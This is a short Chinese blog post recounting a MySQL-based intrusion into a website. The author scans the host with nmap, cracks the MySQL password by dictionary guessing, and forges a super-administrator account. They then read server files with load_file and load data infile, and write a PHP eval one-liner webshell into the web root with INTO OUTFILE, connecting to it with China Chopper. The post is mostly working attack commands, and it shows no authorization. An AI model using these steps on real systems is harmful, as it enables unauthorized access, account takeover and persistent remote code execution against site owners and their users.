关注我们

一次mysql渗透过程

安云安云 安全文摘 2018-06-15 327999 0

1 打开目标站点:www.xxx.com


2 注册账号并登录,大概找下注入点,没找到


3 用namp -A -T4 目标站点扫描开放的服务


   发现mysql等


4 猜弱口令 + 字典  对mysql进行了破译  (运气较好,得到了密码)


5 连接到mysql   找到用户表,密码用md5加密,试了几个,解不出来,应该有加随机字符


   于是复制了一个超级管理员,用户名及密码复制之前注册的账号


6  打开网站首页,登录,进入管理界面。没找到上传漏洞,也没发现物理路径。


7  在mysql 中尝试读取文件


    select load_file('c:/windows/php.ini');  结果为null


  于是创建新表


create table datainfo (aaa text);


  尝试读取文件到表中


       load data infile 'php.ini' into table datainfo; 提示D:phpStudy4IISMySQLdatafactoryphp.ini not found


  可以看出是用phpStudy4IIS创建的,于是下载一个phpStudy4IIS研究目录


      select load_file('D:/phpStudy4IIS/tools/phpStudy.ini');  发现网站根目录等


     写入一句话


     select '<?php @eval($_POST[cmd]); ?>' into outfile 'D:/phpStudy4IIS/WWW/include/xx.php';


     用菜刀连接:www.xxx.com/include/xx.php   cmd

版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢4评论已闭